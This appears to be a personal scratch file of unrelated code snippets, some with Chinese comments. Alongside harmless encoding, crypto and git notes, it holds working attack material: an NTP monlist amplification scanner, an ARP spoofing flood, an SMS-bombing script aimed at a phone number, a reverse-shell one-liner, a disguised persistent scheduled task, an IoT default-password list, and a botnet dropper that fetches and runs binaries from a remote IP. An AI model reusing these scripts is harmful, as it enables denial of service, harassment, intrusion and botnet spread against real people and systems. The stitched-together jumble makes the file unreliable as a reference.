bytecategory

TLV = Struct(
    "type" / Byte,
    "length" / Byte,
    "value" / Bytes(this.length)
)
data = TLV.build({
    "type": 1,
    "length": 4,
    "value": b"rprx"
})
print(data)
def tlv_encode(t, value: bytes):
    length = len(value)
    return bytes([t, length]) + value

data = tlv_encode(0x01, b"rprx")
print(data) 

let l=document.querySelector('pre');l.innerHTML = window.atob(l.innerText)

def wrap_in_try_catch(code):

"""

Wrap PowerShell code in a try-catch block to catch errors and display them.

"""

try_catch_code = """

try {

$ErrorActionPreference = "Stop"

"""

return try_catch_code + code + "\n} catch {\n    Write-Error $_\n}\n"

if [[ "$(uname)" != "Darwin" ]]; then
  echo "❌ This script is intended for macOS only."
  exit 1
fi

[Unit]
Description=ai.happycapy.bridge
After=network.target

[Service]
ExecStart=proxychains4 -q /usr/bin/node /root/capy-mac-bridge/bridge-client.js
WorkingDirectory=/root/capy-mac-bridge
Restart=always
RestartSec=5
StandardOutput=append:/root/capy-mac-bridge/bridge.log
StandardError=append:/root/capy-mac-bridge/bridge.err.log

[Install]
WantedBy=multi-user.target

POST /upload/public-file.json HTTP/1.1
Host: file.liepin.com
Content-Length: XXX
Cookie: XXX
X-Fscp-Std-Info: {"client_id": "XXX"}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXXX
X-Fscp-Trace-Id: XXX 
X-Fscp-Bi-Stat: {"location":"https://c.liepin.com/resume/edit"}
Connection: close

------WebKitFormBoundaryXXX
Content-Disposition: form-data; name="file"; filename="XXX" 
Content-Type: image/jpeg

XXX
------WebKitFormBoundaryXXX
Content-Disposition: form-data; name="bucket"

c_common
------WebKitFormBoundaryXXX--

with TelegramClient("123",...,...) as c:
c.start()
c.get_messages('projectXray',limit=114514)

apt update
apt install -y autoconf automake libtool pkg-config libcurl4-openssl-dev
git clone https://github.com/pooler/cpuminer.git
cd cpuminer/
./autogen.sh
./configure
make
screen -S wk
./minerd -a scrypt -o stratum+tcp://litecoinpool.org:3333 -u ltc1qfwg0lpv2taa.1 -p 1

masscan 0.0.0.0/0 -pU:123 -oX ntp.xml --rate 160000 --exclude 255.255.255.255

from lxml import etree
port = None
address = None
parsedServers = []
# Opens the file used to store single enteries.
outputFile = open('output.txt', 'a')
# Iterates through the masscan XML file.
for event, element in etree.iterparse('ntp.xml', tag="host"):
    for child in element:
        if child.tag == 'address':
            # Assigns the current iterations address to the address variable.
            address = child.attrib['addr']
        if child.tag == 'ports':
            for a in child:
                # Assigns the current iterations port to the port variable.
                port = a.attrib['portid']
        # is both port and IP address are present.

        if port != None and address != None:
            # If the IP hasnt yet been added to the output file.
            if address not in parsedServers:
                print(address)
                # Write the IP address to the file.
                outputFile.write(address + '\n')
                # write the IP to the parsedServers list
                parsedServers.append(address)
            port = None
            address = None
    element.clear()
outputFile.close()
print('End')
from scapy.all import *
import _thread
# Raw packet data used to request Monlist from NTP server
rawData = "\x17\x00\x03\x2a" + "\x00" * 61
# File containing all IP addresses with NTP port open.
logfile = open('output.txt', 'r')
# Output file used to store all monlist enabled servers
outputFile = open('monlistServers.txt', 'a')
def sniffer():
    # Sniffs incomming network traffic on UDP port 48769, all packets meeting thease requirements run through the analyser function.
    sniffedPacket = sniff(filter="udp port 48769", store=0, prn=analyser)

def analyser(packet):
    # If the server responds to the GET_MONLIST command.
    print(len(packet))
    if len(packet) > 200:
        if packet.haslayer(IP):
            print(packet.getlayer(IP).src)
            # Outputs the IP address to a log file.
            outputFile.write(packet.getlayer(IP).src + '\n')

_thread.start_new_thread(sniffer, ())

for address in logfile:
    # Creates a UDP packet with NTP port 123 as the destination and the MON_GETLIST payload.
    address=address.strip()
    send(IP(dst=address)/UDP(sport=48769, dport=123)/Raw(load=rawData))
print('End')

c=Raw(load=b"\x17\x00\x03\x2a" + b"\x00" * 44)

b = NTP(leap=0,version=2,mode=7,stratum=0,poll=3,precision=42,delay=0,dispersion=0,ref_id=0,ref=0,orig=0,recv=0,sent=0)

bytes(c).hex() == bytes(b).hex()

PS C:\Users\Administrator> whoami
desktop-t5qs5ms\administrator
PS C:\Users\Administrator> get-date2026年2月22日 17:28:49PS C:\Users\Administrator> get-netadapter | select-object name,statname                 Status       LinkSpeed----                 ------       ---------
OpenVPN TAP-Windows6 Disconnected 1 Gbps
Ethernet0            Up           1 GbpsPS C:\Users\Administrator> get-netipinterface | sort-object interfa
ily,interfacemetric | select-object -first 6InterfaceAliasias AddressFamily interfacemetric----------------- ------------- ---------------
                       IPv4              25
                       IPv4              25
                       IPv6              25
                       IPv6              25
                       IPv4              75
                       IPv6              75PS C:\Users\Administrator> route print | select-string "0.0.0.0"      0.0.0.0          0.0.0.0    192.168.110.1   192.168.110.4
    224.0.0.0        240.0.0.0            在链路上         127.
    224.0.0.0        240.0.0.0            在链路上    192.168.1PS C:\Users\Administrator> Get-NetTCPConnection -state Established
localaddress,localport,remoteaddress,remoteport,owningprocesslocaladdress  : 192.168.110.47
localport     : 1541
remoteaddress : 4.145.79.82
remoteport    : 443
owningprocess : 68localaddress  : 192.168.110.47
localport     : 1941
remoteaddress : 117.21.204.18
remoteport    : 443
owningprocess : 2140localaddress  : 192.168.110.47
localport     : 1943
remoteaddress : 2.23.244.9
remoteport    : 443
owningprocess : 2140localaddress  : 192.168.110.47
localport     : 1939
remoteaddress : 117.21.204.18
remoteport    : 443
owningprocess : 2140localaddress  : 192.168.110.47
localport     : 1937
remoteaddress : 117.21.204.18
remoteport    : 443
owningprocess : 2140localaddress  : 192.168.110.47
localport     : 1938
remoteaddress : 117.21.204.18
remoteport    : 443
owningprocess : 2140localaddress  : 192.168.110.47
localport     : 1947
remoteaddress : 2.23.244.9
remoteport    : 443
owningprocess : 2140localaddress  : 192.168.110.47
localport     : 1954
remoteaddress : 72.247.234.254
remoteport    : 80
owningprocess : 2140PS C:\Users\Administrator> get-process -id 4Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessNa-------  ------    -----      -----     ------     --  -- ---------
   2356       0      140        124      71.30      4   0 System

Raw(load=data)

SNMP(version="v2c",
     community='public',
     PDU=SNMPbulk(id=103352113,
                  max_repetitions=10,
                  non_repeaters=0,
                  varbindlist=[SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1.1')), # sysDescr  SNMPvarbind(oid=ASN1_OID('1.3.6.1.2.1.1.9.1.3'))] # sysORDescr
                 )
    )

#Magic Packet getBulkEequest
data = b"\x30\x37\x02\x01" #snmp
data += b"\x01" #v2
data += b"\x04\x06\x70\x75\x62\x6c\x69\x63" #community=public
data += b"\xa5\x2a\x02\x04\x06\x29\x07\x31\x02\x01\x00\x02\x01\x0a\x30\x1c\x30\x0b\x06\x07\x2b\x06\x01\x02\x01\x01\x01\x05\x00\x30\x0d\x06\x09\x2b\x06\x01\x02\x01\x01\x09\x01\x03\x05\x00" #getBulkRequest

from ber_tlv.tlv import Tlv
raw_bytes = bytes.fromhex(c)
decoded_list = Tlv.parse(raw_bytes)
decoded_list
[(48,
  [(2, b'\x01'),
   (4, b'public'),
   (165,
    [(2, b'\x01\xbfR'),
     (2, b'\x00'),
     (2, b'd'),
     (48,
      [(48, [(6, b'+\x06\x01\x02\x01\x01\x01'), (5, b'')]),
       (48, [(6, b'+\x06\x01\x02\x01\x01\x01'), (5, b'')])])])])]

from pyasn1.type import univ
from pyasn1.codec.ber import decoder
import binascii

oid = binascii.unhexlify('06072b0601020101010500')
decoder.decode(oid)

from pyasn1.type import univ, tag
from pyasn1.codec.ber import encoder
encoder.encode(univ.Sequence().subtype(implicitTag=tag.Tag(tag.tagClassContext, tag.tagFormatConstructed,5))).hex()

ls /etc/apache2/conf-available/security.conf
echo $?
if the output is 0.
vim /etc/apache2/conf-available/security.conf
else the output is 2.
vim $(grep -l -r --include="*.conf" "# Debian packages." / 2>/dev/null)
enter these on the keyboard in sequence
/[capslock]server[capslock]tokens[esc]n[capslock]n
change to ServerTokens Prod,and add
Header set X-Content-Type-Options: "nosniff"
Header set Cache-Control "no-cache,no-store,no-transform,must-revalidate"
they will prevent resource sniffing,and without cache

p="MicrosoftWebゑㄤゑ0ゑㄤゑ0ゑㄤゑ0ゑㄤゑ0ゑㄤゑ0ゑㄤゑ0ゑㄤゑ0ゑㄤゑ0ゑㄤゑ0ゑㄤゑ0"
p=p.encode('gbk')
e=e_des_encrypt(p,b'Microsoft') # 定义在楼上的链接中
print('0d0f3e0308010000'+zlib.compress(e)

import socket
import zlib
import binascii
import sys
t=r"a1192.168.1.1|8.8.8.8|root||"
t=t.encode('utf-8')
t=zlib.compress(t)
f=binascii.unhexlify("0d0f3e034a000000")
sys.stdout.buffer.write(f+t)
sys.stdout.buffer.flush()

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <soap:Body>
    <Search2018Response xmlns="http://tempuri.org/">
      <Search2018Result>1</Search2018Result>
      <hashesOut>        <string>25d55ad283aa400af464c76d713c07ad</string>
      </hashesOut>
      <results>
        <string>I love you.</string>
      </results>
      <hashtype>0</hashtype>
      <balance>114514</balance>
      <id>114514</id>
      <hashcount>1</hashcount>
      <error>0</error>
      <errmsg />
      <MaxTasks>0</MaxTasks>
    </Search2018Response>
  </soap:Body>
</soap:Envelope>

<!DOCTYPE html>
<html lang="en-US">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0"> 
    <style>
body {
 margin: 0;
 padding: 0;
        height: 100vh;
        display: flex;
        justify-content: center;
        align-items: center;
        overflow: hidden;
        }
#bytecategory { 
        max-height: 100vh;
        object-fit: contain;
        transform-origin: center center;
 image-rendering: smooth;
        }    
    </style>
</head>
<body>
    <img id="bytecategory" src="G9yNklha8AAJEsx.png">
    <script>
     const t=document.getElementById("bytecategory");let s=.777;t.style.transform="scale(${s})";const d=setInterval(()=>{s*=1.001;s>=1.4&&(clearInterval(d),setTimeout(()=>{let a=1;const b=setInterval(()=>{a-=.02;a<=0&&(a=0,clearInterval(b));t.style.opacity=a},20)},30));t.style.transform=`scale(${s})`},30);
    </script>
</body>
</html>

import idc
l=idc.get_bytes(0x0040D1D8,0x0040D1FC-0x0040D1D8)
k=idc.get_bytes(0x0040D204,0x0040D22C-0x0040D204)
def dword(t):
    return bytes(list(t)).decode('gbk')
print(dword(l),dword(k))

<script type='text/javascript'>
function LYC()
{
var cmd=new ActiveXObject("WScript.Shell");
var cmdStr="cmd /c shutdown /s";
var res=cmd.run(cmdStr,0,true);
}

<button type="button" onclick="LYC()">点击我</button>

from scapy.all import *
ipconfig=conf.iface.name
getmac=get_if_hwaddr(ipconfig)
with open('/etc/resolv.conf','r') as r:
    for j in r:
        p=j.split()[-1]
pkg=Ether(dst="ff:ff:ff:ff:ff:ff",src=getmac)/ARP(op="is-at",psrc=p,pdst=p+'/24')
while True:
    sendp(pkg,loop=1)

import os
import datetime
from unrar import rarfile
import sys
def crack(encryptfile):
    bFound=False
    fp=rarfile.RarFile(winfile)
    start=0
    stop=9999
    for i in range(start,stop):
        pwd=str(i).zfill(4)
        try:
            fp.extractall(path=".",pwd=pwd)
            print('\npassword'+pwd)
            bFound=True
            fp.close
        except Exception as e:
            print("\rcomplete","{:.0%}".format((i-start)/(stop-start)),end="")
        if bFound:
            break
if __name__=='__main__':
    starttime=datetime.datetime.now()
    crack(sys.argv[1])

import requests
from stem import Signal
from stem.control import Controller
url="https://check.torproject.org"
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
from bs4 import BeautifulSoup 
proxies = {'https':'socks5h://127.0.0.1:9150'}
while True:
        try:
            c=Controller.from_port()
            c.authenticate()
            c.signal(Signal.NEWNYM)
            r = requests.get(url=url, proxies=proxies,verify=False).text
            print(BeautifulSoup(r,'lxml').strong.string)
        except KeyboardInterrupt:
            print('Control-C')
            break

<?php
$char="{$_SERVER['REMOTE_ADDR']}" . "\t" . date('Y-m-d H:i:s') . "\t" . "{$_SERVER['HTTP_USER_AGENT']}" . "\n";
fwrite(fopen('0.txt','a'),$char);
?>

gh repo clone https://github.com/bytecategory/legacytech.git
cd legacytech
rm -rf .git
git init 
git remote add origin https://github.com/bytecategory/legacytech.git

git add -A
git commit -m "~"
git branch -M main
git push -f origin main

git lfs track 1.ISO
git lfs track 2.ISO
git lfs track 3.ISO 
git lfs track 4.ISO
git add .gitattributes
git add -A
git commit -m "~"

from sympy import mod_inverse

p = 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF
a = 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFC
b = 0x5AC635D8AA3A93E7B3EBBD55769886BC651D06B0CC53B0F63BCE3C3E27D2604B
x = 0x6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296
y = 0x4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5
n = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551
U221E = (0,0) 

def point_add(P1 , P2):
    if P1 == U221E:
        return P2
    if P2 == U221E:
        return P1
    x1 , y1 = P1
    x2 , y2 = P2
    if x1 != x2:
        m = (y2 - y1) * mod_inverse(x2 - x1,p) % p
        x3 = (m ** 2 - x1 - x2) % p
        y3 = (m * (x1 - x3) - y1) % p
        return (x3,y3)
    if x1 == x2 and y1 != y2:
        return U221E

def point_double(P1, P2):
    x1 , y1 = P1
    x2 , y2 = P2
    if P1 == P2 and y1 != 0:
        m = (3 * x1 ** 2 + a) * mod_inverse(2 * y1,p) % p
        x3 = (m ** 2 - 2 * x1) % p
        y3 = (m * (x1 - x3) - y1) % p
        return (x3,y3)
    if P1 == P2 and y1 == 0:
        return U221E

def double_and_add(s,P):
    bits = format(s,'b')[::-1]
    res = U221E
    temp = P
    for bit in bits:       
        if bit == '1':
            res = point_add(res , temp)
        temp = point_double(temp , temp)
    return res

import requests
url='https://jinshuju.com/graphql/f/GWSnA4'
json = [
    {
        'operationName': 'CreateFieldVerification',
        'variables': {
            'input': {
                'fieldApiCode': 'field_1',
                'formId': 'GWSnA4',
                'mobile': '15829381956',
             
            },
        },    
        'extensions': {
            'persistedQuery': {
                'sha256Hash': '77e2c905d36069c91d2ea55e915a1916204393b04a632087d59001301e6f7f5b'
                               
        },
    },
    }
]
# mobile可以在t.me/qingbaoju_qun里找
# 自行换成你要轰炸的电话号码
# [.] 换成 .
requests.post(url=url, json=json)

apt install amule-daemon
adduser amuleusername
passwd -d amuleusername
su - amuleusername 建议这样做
amuled -f 
vim ~/.aMule/amule.conf
echo -n "1234" | md5sum
# 在~/.aMule/amule.conf中设置ECPassword和 AcceptExternalConnections字段
ECPassword 81dc9bdb52d04dc20036dbd8313ed055
AcceptExternalConnections 1
cd ~/.aMule
把http://upd.emule-security.org/nodes.dat下载到这个目录
amulecmd
输入aMule连接的密码后(我这里是1234)

cat /tmp/p | /bin/sh/ -i 2>&1 | ncat 8.8.8.8 53 > /tmp/p

gdb /bin/sh
如果像我一样没有调试符号,那么就用寄存器而非argc,argv一类.
(gdb) break execve
(gdb) set-follow-fork-mode child
(gdb) set detach-on-fork off
(gdb) run -i
# ls
info registers
记下rdi的地址(无论0x0(十六进制)列下还是0(十进制)列下)
x/s 0x555555574688
输出 /usr/bin/ls
记下rsi的地址0x555555574510
x/s ((char**)0x555555574510)[0]

xxd -l -s 114513 -l 3 xray

a=open('/root/Downloads/xray','rb')
a.seek(114513)
114513
a.read(3).hex()

a.close()

from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives import serialization
from cryptography import x509
y = open("./int-ye1.pem",'rb')
l = y.read()
y.close()
c = x509.load_pem_x509_certificate(l) 
p = c.public_key()
u = p.public_bytes(encoding=serialization.Encoding.X962,format=serialization.PublicFormat.UncompressedPoint)

Q = ec.derive_private_key(L, ec.SECP384R1())
Q.exchange(ec.ECDH(), p)

Get-Command -Module ScheduledTasks

Register-ScheduledTask -TaskName "DOEVIL" -Description "DOEVIL" -Action (New-ScheduledTaskAction -Execute "notepad.exe") -Trigger (New-ScheduledTaskTrigger -daily -at '18:08 pm') -TaskPath "\Microsoft\Windows\Windows Error Reporting"
$t=Get-ScheduledTask -TaskName "DOEVIL"
$t.Settings.ExecutionTimeLimit="PT720H"
#(如果任务运行时间超过以下时间(720小时),停止任务)
$t.Settings.StartWhenAvailable=$true
#(如果过了计划开始时间,立即启动任务)
Set-ScheduledTask -TaskName "DOEVIL" -Settings $t.Settings

...
root
Pon521
Zte521
root621
vizxv
oelinux123
wabjtam
Zxic521
tsgoingon
123456
xc3511
solokey
default
a1sev5y7c39k
hkipc2016
unisheen
Fireitup
hslwificam
jvbzd
1001chin
system
zlxx.
admin
7ujMko0vizxv
1234horses
antslq
xc12345
xmhdipc
icatch99
founder88
xirtam
taZz@01
/*6.=_ja
12345
t0talc0ntr0l4!
7ujMko0admin
telecomadmin
ipcam_rt5350
juantech
1234
dreambox
IPCam@sw
zhongxing
hi3518
hg2x0
dropper
ipc71a
root123
telnet
ipcam
grouter
GM8182
20080826
3ep5w2u
uFwfBht5
VnT3ch@dm1n
admin123
admin1234
admin@123
BrAhMoS@15
GeNeXiS@19
firetide
2601hx
service
password
supportadmin
telnetadmin
admintelecom
guest
video
user
nobody
daemon
1cDuLJ7c
tlJwpbo6
S2fGqNFs
OxhlwSG8
lJwpbo6
tluafed
vstarcam2015
20150602
support
hikvision
e8ehomeasb
e8ehome
e8telnet
cisco
...

cd /tmp || cd /var/tmp || cd /var || cd /mnt || cd /dev || cd /
wget http://87.121.84.101/frost.armv7; chmod 777 frost.armv7; ./frost.armv7 dvr.lilin; rm frost.armv7
wget http://87.121.84.101/frost.armv6; chmod 777 frost.armv6; ./frost.armv6 dvr.lilin; rm frost.armv6
wget http://87.121.84.101/frost.armv5; chmod 777 frost.armv5; ./frost.armv5 dvr.lilin; rm frost.armv5
wget http://87.121.84.101/frost.mips; chmod 777 frost.mips; ./frost.mips dvr.lilin; rm frost.mips
wget http://87.121.84.101/frost.mipsel; chmod 777 frost.mipsel; ./frost.mipsel dvr.lilin; rm frost.mipsel
wget http://87.121.84.101/frost.aarch64; chmod 777 frost.aarch64; ./frost.aarch64 dvr.lilin; rm frost.aarch64
wget http://87.121.84.101/frost.x86; chmod 777 frost.x86; ./frost.x86 dvr.lilin; rm frost.x86
wget http://87.121.84.101/frost.x86_64; chmod 777 frost.x86_64; ./frost.x86_64 dvr.lilin; rm frost.x86_64
As for now
strace -f qemu-arm ./frost.armv7
Key Code
write(1, "pwned :3", 8)
connect(4, {sa_family=AF_INET, sin_port=htons(5555), sin_addr=inet_addr("144.172.103.124")}, 16) 
unlink("./frost.armv7") # the reason I stop